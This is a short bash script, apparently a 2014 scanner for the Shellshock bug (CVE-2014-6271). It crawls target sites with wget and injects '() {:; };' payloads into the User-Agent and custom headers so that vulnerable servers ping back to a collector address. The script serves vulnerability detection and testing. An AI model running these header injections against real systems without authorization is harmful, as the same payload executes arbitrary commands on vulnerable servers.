#!/bin/bash
#-----------------------------------------------------------------------
# Purpose: scan for CVE-2014-6271 (bash "shellshock" bug)
# Created: 2014-09-25
# Author: Royce Williams <royce@techsolvency.com>
# License: public domain
#-----------------------------------------------------------------------

# Your IP that will listen for responses.
COLLECTOR_IP=127.0.0.1

# Your list of targets.
TARGET_LIST="\
    https://target.example.net/ \
"
#-----------------------------------------------------------------------
# Scan.

[ ! -d /var/tmp/bashwalk ] && mkdir /var/tmp/bashwalk

for target_site in ${TARGET_LIST}; do
    echo "Testing ${target_site} ..."

    # Generate a mostly-unique cookie based on the URL.
    TARGET_COOKIE=`echo $target_site | tr -c [:alnum:] \~`
    echo Using cookie: ${TARGET_COOKIE}

    # By using 'User-Agent', we show up in the target logs - useful for debugging.
    wget -e robots=off -r -l inf --force-html --spider --no-check-certificate \
        -R 7z,avi,bin.bz2,csv,db,dbf,doc,docx,dmg,flv,gif,gz,img,iso,jpg,jpeg,m4a,m4v,mp3,mpg,pdf,png,ppt,pptx,rpm,rtf,swf,tar,tgz,ttf,txt,vob,wav,wma,wmv,xls,xlsx,zip \
        --header "User-Agent:() {:; }; bashwalk to ${COLLECTOR_IP}" \
        --header "X-Custom-0:() {:; }; /usr/bin/ping  ${COLLECTOR_IP}" \
        --header "X-Custom-1:() {:; }; /bin/ping      ${COLLECTOR_IP}" \
        --header "X-Custom-2:() {:; }; /sbin/ping     ${COLLECTOR_IP}" \
        --header "X-Custom-3:() {:; }; /usr/sbin/ping ${COLLECTOR_IP}" \
        $target_site 2>&1 \
    | tee /var/tmp/bashwalk/${TARGET_COOKIE}

done

#-----------------------------------------------------------------------